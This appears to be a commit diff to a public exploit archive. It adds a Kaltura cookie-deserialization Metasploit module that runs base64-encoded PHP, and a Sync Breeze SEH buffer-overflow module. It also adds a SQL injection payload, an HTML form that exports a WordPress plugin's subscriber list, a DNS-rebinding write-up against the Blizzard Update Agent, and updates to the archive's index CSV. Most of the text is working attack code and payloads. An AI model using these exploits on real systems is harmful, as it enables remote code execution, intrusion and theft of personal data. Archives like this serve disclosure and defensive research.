+      'uri' => normalize_uri(target_uri.path, 'index.php', 'keditorservices', 'getAllEntries'),
+      'vars_get' => {
+        'list_type' => '15',
+        'entry_id' => entry_id
+      }
+    )
+
+    return res.body.include? entry_id
+  end
+
+  def exploit
+    entry_id = datastore['ENTRYID']
+    cmd = "print_r(eval(base64_decode('#{Rex::Text.encode_base64(payload.encode)}'))).die()"
+
+    p = ""
+    p << "a:1:{s:1:\"z\";O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";"
+    p << "a:1:{i:0;O:20:\"Zend_Log_Writer_Mail\":5:{s:16:\"\00*\00_eventsToMail\";"
+    p << "a:1:{i:0;i:1;}s:22:\"\00*\00_layoutEventsToMail\";a:0:{}s:8:\"\00*\00_mail\";"
+    p << "O:9:\"Zend_Mail\":0:{}s:10:\"\00*\00_layout\";O:11:\"Zend_Layout\":3:{s:13:\"\00*\00_inflector\";"
+    p << "O:23:\"Zend_Filter_PregReplace\":2:{s:16:\"\00*\00_matchPattern\";s:7:\"/(.*)/e\";"
+    p << "s:15:\"\00*\00_replacement\";s:#{cmd.length.to_s}:\"#{cmd}\";}s:20:\"\00*\00_inflectorEnabled\";"
+    p << "b:1;s:10:\"\00*\00_layout\";s:6:\"layout\";}s:22:\"\00*\00_subjectPrependText\";N;}}};}"
+
+    encoded = Rex::Text.encode_base64(p)
+    hash = Rex::Text.md5("#{encoded}#{CookieSecret}")
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'index.php', 'keditorservices', 'getAllEntries'),
+      'vars_get' => {
+        'list_type' => '15',
+        'entry_id' => entry_id
+      },
+      'cookie' => "userzone=#{encoded}#{hash}"
+    )
+
+    if res && res.redirect?
+      print_error("Got a redirect, maybe you are not using https? #{res.headers['Location']}")
+    elsif res && res.code != 200
+      print_error('Unexpected response...')
+    else
+      print_status("Output: #{res.body}")
+    end
+  end
+end

exploits/php/webapps/43870.txt

@@ -0,0 +1,29 @@
+# # # # # 
+# Exploit Title: Professional Local Directory Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 23.01.2018
+# Vendor Homepage: http://www.eihitech.com/
+# Software Link: http://www.eihitech.com/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-5973
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/sellers_subcategories.php?IndustryID=[SQL]
+# 
+# -105++/*!08888uNiOn*/(/*!08888SelECt*/+0x3078323833313239,0x283229,0x283329,0x283429,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x283629,0x283729)--+-
+# 
+# 2)
+# http://localhost/[PATH]/suppliers.php?IndustryID=[SQL]&CategoryID=[SQL]
+# 
+# # # # #

exploits/php/webapps/43872.html

@@ -0,0 +1,18 @@
+# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure
+# Google Dork:
+# Date: 2018-01-23
+# Exploit Author: ThreatPress Security
+# Vendor Homepage: http://icegram.com/
+# Software Link: https://wordpress.org/plugins/email-subscribers/
+# Version: 3.4.7
+# Tested on: WordPress 4.9.2
+# CVE :
+
+Email Subscribers & Newsletters, a popular WordPress plugin, has just fixed
 the vulnerability that allows an unauthenticated user to download the entire subscriber 
list with names and e-mail addresses.
+
+Exploit:
+
+<form action="http://DOMAINTOTEST.com/?es=export" method="post">
+    <input type="text" name="option" value="view_all_subscribers" />
+    <input type="submit" value="Exploit" />
+</form>

exploits/windows/local/43875.rb

@@ -0,0 +1,75 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Remote::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow',
+      'Description'     => %q(
+        This module exploits a buffer overflow in Sync Breeze Enterprise 9.5.16
+        by using the import command option to import a specially crafted xml file.
+      ),
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Daniel Teixeira'
+        ],
+      'References'      =>
+        [
+          [ 'CVE', '2017-7310' ],
+          [ 'EDB', '41773' ]
+        ],
+      'DefaultOptions'  =>
+        {
+          'EXITFUNC' => 'seh',
+          'DisablePayloadHandler' => 'true'
+        },
+      'Platform'        => 'win',
+      'Payload'         =>
+        {
+          'BadChars' => "\x00\x01\x02\x0a\x0b\x0c\x22\x27",
+          'StackAdjustment' => -3500
+        },
+      'Targets'         =>
+        [
+          ['Windows Universal', { 'Ret' => 0x10015FFE } ]
+        ],
+      'Privileged'      => false,
+      'DisclosureDate'  => 'Mar 29 2017',
+      'DefaultTarget'   => 0))
+
+    register_options(
+      [
+        OptString.new('FILENAME', [true, 'The file name.', 'msf.xml'])
+      ])
+  end
+
+  def exploit
+    jmpesp = "\x7A\xB7\x1B\x65" # JMP ESP QtGui4.dll
+    esp = "\x8D\x44\x24\x4C" # LEA EAX, [ESP+76]
+    jmp = "\xFF\xE0" # JMP ESP
+
+    buffer =  "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<classify\nname=\'"
+    buffer << "\x90" * 1536
+    buffer << jmpesp
+    buffer << "\x90" * 18
+    buffer << esp
+    buffer << jmp
+    buffer << "\x90" * 68
+    buffer << generate_seh_record(target.ret)
+    buffer << "\x90" * 10
+    buffer << payload.encoded
+    buffer << "\x90" * 5000
+    buffer << "\n</classify>"
+
+    print_status("Creating '#{datastore['FILENAME']}' file ...")
+    file_create(buffer)
+  end
+end

exploits/windows/local/43879.txt

@@ -0,0 +1,53 @@
+All blizzard games are installed alongside a shared tool called "Blizzard Update Agent", investor.activision.com claims they have "500 million monthly active users", who presumably all have this utility installed.
+
+The agent utility creates an JSON RPC server listening on localhost port 1120, and accepts commands to install, uninstall, change settings, update and other maintenance related options. Blizzard use a custom authentication scheme to verify the rpc's are from a legitimate source, it looks like this:
+
+$ curl -si http://localhost:1120/agent
+HTTP/1.0 200 OK
+Content-Length: 359
+
+{
+        "pid" : 3140.000000,
+        "user_id" : "S-1-5-21-1613814707-140385463-2225822625-1000",
+        "user_name" : "S-1-5-21-1613814707-140385463-2225822625-1000",
+        "state" : 1004.000000,
+        "version" : "2.13.4.5955",
+        "region" : "us",
+        "type" : "retail",
+        "opt_in_feedback" : true,
+        "session" : "15409717072196133548",
+        "authorization" : "11A87920224BD1FB22AF5F868CA0E789"
+}
+
+This endpoint is permitted without authentication, but all other requests must have a valid "Authorization" header with the token in that response. As with all HTTP RPC schemes like this, a website can send requests to the daemon with XMLHttpRequest(), but I think the theory is they will be ignored because requests must prove they can read and write the authorization property.
+
+I don't think this design will work because of an attack called "dns rebinding". Any website can simply create a dns name that they are authorized to communicate with, and then make it resolve to localhost.
+
+To be clear, this means that *any* website can send privileged commands to the agent.
+
+I have a domain I use for testing called rbndr.us, you can use this page to generate hostnames:
+
+https://lock.cmpxchg8b.com/rebinder.html
+
+Here I want to alternate between 127.0.0.1 and 199.241.29.227, so I use 7f000001.c7f11de3.rbndr.us:
+
+$ host 7f000001.c7f11de3.rbndr.us
+7f000001.c7f11de3.rbndr.us has address 127.0.0.1
+$ host 7f000001.c7f11de3.rbndr.us
+7f000001.c7f11de3.rbndr.us has address 199.241.29.227
+$ host 7f000001.c7f11de3.rbndr.us
+7f000001.c7f11de3.rbndr.us has address 127.0.0.1
+
+Here you can see the resolution alternates between the two addresses I want (note that depending on caching it might take a while to switch, the TTL is set to minimum but some servers round up).
+
+I just wait for the cached response to expire, and then POST commands to the server.
+
+Exploitation would involve using network drives, or setting destination to "Downloads" and making the browser install dlls, datafiles, etc.
+
+I made a very simple demo, I'm sure it's quite brittle, but hopefully you get the idea!
+
+http://lock.cmpxchg8b.com/yah4od7N.html
+
+See screenshot attached of how it's supposed to look.
+
+Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43665.zip

files_exploits.csv

@@ -5259,7 +5259,7 @@ id,file,description,date,author,type,platform,port
 43780,exploits/macos/dos/43780.c,"macOS 10.13 (17A365) - Kernel Memory Disclosure due to Lack of Bounds Checking in 'AppleIntelCapriController::getDisplayPipeCapability'",2018-01-19,"Google Security Research",dos,macos,
 43826,exploits/windows/dos/43826.txt,"Peercast < 0.1211 - Format String",2015-05-28,"GulfTech Security",dos,windows,
 43854,exploits/windows/dos/43854.py,"MixPad 5.00 - Buffer Overflow",2018-01-23,bzyo,dos,windows,
-43856,exploits/hardware/dos/43856.py,"RAVPower 2.000.056 - Memory Disclosure",2018-01-23,"Daniele Linguaglossa",dos,hardware,
+43856,exploits/hardware/dos/43856.py,"RAVPower 2.000.056 - Memory Disclosure",2018-01-23,"Daniele Linguaglossa & Stefano Farletti",dos,hardware,
 40570,exploits/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash (PoC)",2016-10-18,"Antonio Z.",dos,osx,
 40592,exploits/windows/dos/40592.py,"SAP NetWeaver KERNEL 7.0 < 7.5 - Denial of Service",2016-10-20,ERPScan,dos,windows,
 40593,exploits/windows/dos/40593.py,"SAP Adaptive Server Enterprise 16 - Denial of Service",2016-10-20,ERPScan,dos,windows,
@@ -9004,7 +9004,7 @@ id,file,description,date,author,type,platform,port
 38817,exploits/linux/local/38817.txt,"Poppler 0.14.3 - '/utils/pdfseparate.cc' Local Format String",2013-10-26,"Daniel Kahn Gillmor",local,linux,
 38832,exploits/linux/local/38832.py,"RHEL 7.0/7.1 - 'abrt/sosreport' Local Privilege Escalation",2015-12-01,rebel,local,linux,
 38835,exploits/multiple/local/38835.py,"Centos 7.1 / Fedora 22 - abrt Privilege Escalation",2015-12-01,rebel,local,multiple,
-38847,exploits/windows/local/38847.py,"Acunetix WVS 10 - Local Privilege Escalation",2015-12-02,"Daniele Linguaglossa",local,windows,
+38847,exploits/windows/local/38847.py,"Acunetix WVS 10 - Local Privilege Escalation",2015-12-02,"Daniele Linguaglossa & Stefano Farletti",local,windows,
 38871,exploits/windows/local/38871.txt,"Cyclope Employee Surveillance 8.6.1 - Insecure File Permissions",2015-12-06,loneferret,local,windows,
 38903,exploits/windows/local/38903.txt,"iniNet SpiderControl SCADA Web Server Service 2.02 - Insecure File Permissions",2015-12-08,LiquidWorm,local,windows,
 38904,exploits/windows/local/38904.txt,"iniNet SpiderControl PLC Editor Simatic 6.30.04 - Insecure File Permissions",2015-12-08,LiquidWorm,local,windows,
@@ -9172,6 +9172,9 @@ id,file,description,date,author,type,platform,port
 43816,exploits/windows/local/43816.txt,"dbPowerAmp < 2.0/10.0 - Buffer Overflow",2014-09-27,"GulfTech Security",local,windows,
 43817,exploits/windows/local/43817.txt,"PsychoStats < 2.2.4 Beta - Cross Site Scripting",2014-12-22,"GulfTech Security",local,windows,
 43857,exploits/windows/local/43857.py,"HP Connected Backup 8.6/8.8.6 - Local Privilege Escalation",2018-01-23,"Peter Lapp",local,windows,
+43875,exploits/windows/local/43875.rb,"Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow (Metasploit)",2018-01-24,Metasploit,local,windows,
+43878,exploits/multiple/local/43878.md,"Oracle VirtualBox < 5.1.30 / < 5.2-rc1 - Guest to Host Escape",2018-01-24,SecuriTeam,local,multiple,
+43879,exploits/windows/local/43879.txt,"Blizzard Update Agent - JSON RPC DNS Rebinding",2018-01-23,"Google Security Research",local,windows,1120
 40538,exploits/windows/local/40538.txt,"Graylog Collector 0.4.2 - Unquoted Service Path Privilege Escalation",2016-10-14,"Joey Lane",local,windows,
 40540,exploits/windows/local/40540.txt,"NETGATE AMITI Antivirus 23.0.305 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,local,windows,
 40541,exploits/windows/local/40541.txt,"NETGATE Data Backup build 3.0.605 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,local,windows,
@@ -9403,7 +9406,7 @@ id,file,description,date,author,type,platform,port
 42454,exploits/macos/local/42454.txt,"Xamarin Studio for Mac 6.2.1 (build 3) / 6.3 (build 863) - Local Privilege Escalation",2017-08-14,Securify,local,macos,
 42455,exploits/windows/local/42455.py,"ALLPlayer 7.4 - Local Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,local,windows,
 42456,exploits/windows/local/42456.py,"Internet Download Manager 6.28 Build 17 - Local Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,local,windows,
-42460,exploits/osx/local/42460.py,"NoMachine 5.3.9 - Local Privilege Escalation",2017-08-09,"Daniele Linguaglossa",local,osx,
+42460,exploits/osx/local/42460.py,"NoMachine 5.3.9 - Local Privilege Escalation",2017-08-09,"Daniele Linguaglossa & Stefano Farletti",local,osx,
 42521,exploits/windows/local/42521.py,"Easy DVD Creater 2.5.11 - Local Buffer Overflow (SEH)",2017-08-19,"Anurag Srivastava",local,windows,
 42536,exploits/windows/local/42536.py,"Disk Pulse Enterprise 9.9.16 - 'Import Command' Local Buffer Overflow",2017-08-22,"Anurag Srivastava",local,windows,
 42537,exploits/windows/local/42537.txt,"PDF-XChange Viewer 2.5 Build 314.0 - Code Execution",2017-08-21,"Daniele Votta",local,windows,
@@ -15123,7 +15126,7 @@ id,file,description,date,author,type,platform,port
 34622,exploits/windows/remote/34622.txt,"Axigen Webmail 1.0.1 - Directory Traversal",2010-09-15,"Bogdan Calin",remote,windows,
 34647,exploits/windows/remote/34647.txt,"Ammyy Admin 3.5 - Remote Code Execution (Metasploit)",2014-09-13,scriptjunkie,remote,windows,
 34654,exploits/windows/remote/34654.c,"SWiSH Max3 - DLL Loading Arbitrary Code Execution",2010-09-20,anT!-Tr0J4n,remote,windows,
-34668,exploits/windows/remote/34668.txt,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)",2014-09-15,"Daniele Linguaglossa",remote,windows,80
+34668,exploits/windows/remote/34668.txt,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)",2014-09-15,"Daniele Linguaglossa & Stefano Farletti",remote,windows,80
 34669,exploits/multiple/remote/34669.rb,"Railo 4.2.1 - Remote File Inclusion (Metasploit)",2014-09-15,Metasploit,remote,multiple,80
 34670,exploits/multiple/remote/34670.rb,"ManageEngine Eventlog Analyzer - Arbitrary File Upload (Metasploit)",2014-09-15,Metasploit,remote,multiple,8400
 34671,exploits/java/remote/34671.rb,"SolarWinds Storage Manager - Authentication Bypass (Metasploit)",2014-09-15,Metasploit,remote,java,9000
@@ -15760,7 +15763,7 @@ id,file,description,date,author,type,platform,port
 39735,exploits/windows/remote/39735.rb,"Advantech Webaccess Dashboard Viewer - Arbitrary File Upload (Metasploit)",2016-04-26,Metasploit,remote,windows,80
 39736,exploits/linux/remote/39736.txt,"libgd 2.1.1 - Signedness Heap Overflow",2016-04-26,"Hans Jerry Illikainen",remote,linux,
 39742,exploits/php/remote/39742.txt,"PHP 7.0.5 - ZipArchive::getFrom* Integer Overflow",2016-04-28,"Hans Jerry Illikainen",remote,php,
-39755,exploits/windows/remote/39755.py,"Acunetix WVS 10 - Remote Command Execution",2016-05-02,"Daniele Linguaglossa",remote,windows,
+39755,exploits/windows/remote/39755.py,"Acunetix WVS 10 - Remote Command Execution",2016-05-02,"Daniele Linguaglossa & Stefano Farletti",remote,windows,
 39756,exploits/linux/remote/39756.rb,"Apache Struts - Dynamic Method Invocation Remote Code Execution (Metasploit)",2016-05-02,Metasploit,remote,linux,8080
 39783,exploits/windows/remote/39783.py,"Dell SonicWALL Scrutinizer 11.0.1 - setUserSkin/deleteTab SQL Injection Remote Code Execution",2016-05-09,mr_me,remote,windows,
 39792,exploits/ruby/remote/39792.rb,"Ruby on Rails - Development Web Console (v2) Code Execution (Metasploit)",2016-05-09,Metasploit,remote,ruby,3000
@@ -15833,6 +15836,9 @@ id,file,description,date,author,type,platform,port
 43659,exploits/hardware/remote/43659.md,"Seagate Personal Cloud - Multiple Vulnerabilities",2018-01-11,SecuriTeam,remote,hardware,
 43665,exploits/multiple/remote/43665.md,"Transmission - RPC DNS Rebinding",2018-01-11,"Google Security Research",remote,multiple,9091
 43693,exploits/hardware/remote/43693.txt,"Master IP CAM 01 - Multiple Vulnerabilities",2018-01-17,"Raffaele Sabato",remote,hardware,
+43871,exploits/hardware/remote/43871.py,"RAVPower 2.000.056 - Root Remote Code Execution",2018-01-24,"Daniele Linguaglossa & Stefano Farletti",remote,hardware,
+43876,exploits/php/remote/43876.rb,"Kaltura - Remote PHP Code Execution over Cookie (Metasploit)",2018-01-24,Metasploit,remote,php,
+43877,exploits/multiple/remote/43877.rb,"GoAhead Web Server - 'LD_PRELOAD' Arbitrary Module Load (Metasploit)",2018-01-24,Metasploit,remote,multiple,
 40561,exploits/multiple/remote/40561.rb,"Ruby on Rails - Dynamic Render File Upload / Remote Code Execution (Metasploit)",2016-10-17,Metasploit,remote,multiple,
 40589,exploits/hardware/remote/40589.html,"MiCasaVerde VeraLite - Remote Code Execution",2016-10-20,"Jacob Baines",remote,hardware,
 40609,exploits/linux/remote/40609.rb,"Hak5 WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,remote,linux,1471
@@ -31900,7 +31906,7 @@ id,file,description,date,author,type,platform,port
 31164,exploits/php/webapps/31164.txt,"Prince Clan Chess Club 0.8 com_pcchess Component - 'user_id' SQL Injection",2008-02-12,S@BUN,webapps,php,
 31258,exploits/ios/webapps/31258.txt,"SimplyShare 1.4 iOS - Multiple Vulnerabilities",2014-01-29,Vulnerability-Lab,webapps,ios,
 31335,exploits/php/webapps/31335.txt,"MG2 - 'list' Cross-Site Scripting",2008-03-04,"Jose Carlos Norte",webapps,php,
-40357,exploits/hardware/webapps/40357.py,"Vodafone Mobile Wifi - Reset Admin Password",2016-09-09,"Daniele Linguaglossa",webapps,hardware,80
+40357,exploits/hardware/webapps/40357.py,"Vodafone Mobile Wifi - Reset Admin Password",2016-09-09,"Daniele Linguaglossa & Stefano Farletti",webapps,hardware,80
 31700,exploits/php/webapps/31700.txt,"e107 CMS 0.7 - Multiple Cross-Site Scripting Vulnerabilities",2008-04-24,ZoRLu,webapps,php,
 31701,exploits/php/webapps/31701.txt,"Digital Hive 2.0 - 'base.php' Cross-Site Scripting",2008-04-24,ZoRLu,webapps,php,
 31173,exploits/php/webapps/31173.txt,"pChart 2.1.3 - Multiple Vulnerabilities",2014-01-24,"Balazs Makany",webapps,php,80
@@ -34101,7 +34107,7 @@ id,file,description,date,author,type,platform,port
 34849,exploits/php/webapps/34849.txt,"AdvertisementManager 3.1 - 'req' Local/Remote File Inclusion",2010-01-19,indoushka,webapps,php,
 34850,exploits/php/webapps/34850.txt,"eXV2 CMS - Multiple Cross-Site Scripting Vulnerabilities",2010-10-15,LiquidWorm,webapps,php,
 34851,exploits/php/webapps/34851.txt,"Bacula-Web 5.2.10 - 'joblogs.php?jobid' SQL Injection",2014-10-02,wishnusakti,webapps,php,80
-34852,exploits/windows/webapps/34852.txt,"Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution",2014-10-02,"Daniele Linguaglossa",webapps,windows,80
+34852,exploits/windows/webapps/34852.txt,"Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution",2014-10-02,"Daniele Linguaglossa & Stefano Farletti",webapps,windows,80
 34854,exploits/php/webapps/34854.txt,"WordPress Plugin All In One WP Security & Firewall 3.8.3 - Persistent Cross-Site Scripting",2014-10-02,Vulnerability-Lab,webapps,php,80
 34858,exploits/php/webapps/34858.txt,"RBS Change Complet Open Source 3.6.8 - Cross-Site Request Forgery",2014-10-02,"Krusty Hack",webapps,php,80
 34861,exploits/php/webapps/34861.txt,"PHPCompta/NOALYSS 6.7.1 5638 - Remote Command Execution",2014-10-02,Portcullis,webapps,php,80
@@ -37260,6 +37266,8 @@ id,file,description,date,author,type,platform,port
 43867,exploits/php/webapps/43867.html,"Photography CMS 1.0 - Cross-Site Request Forgery (Add Admin)",2018-01-23,"Ihsan Sencan",webapps,php,
 43868,exploits/php/webapps/43868.txt,"Quickad 4.0 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,
 43869,exploits/php/webapps/43869.txt,"Flexible Poll 1.2 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,
+43870,exploits/php/webapps/43870.txt,"Professional Local Directory Script 1.0 - SQL Injection",2018-01-24,"Ihsan Sencan",webapps,php,
+43872,exploits/php/webapps/43872.html,"WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure",2018-01-24,"ThreatPress Security",webapps,php,
 40542,exploits/php/webapps/40542.txt,"Student Information System (SIS) 0.1 - Authentication Bypass",2016-10-14,lahilote,webapps,php,
 40543,exploits/php/webapps/40543.txt,"Web Based Alumni Tracking System 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php,
 40544,exploits/php/webapps/40544.txt,"Simple Dynamic Web 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php,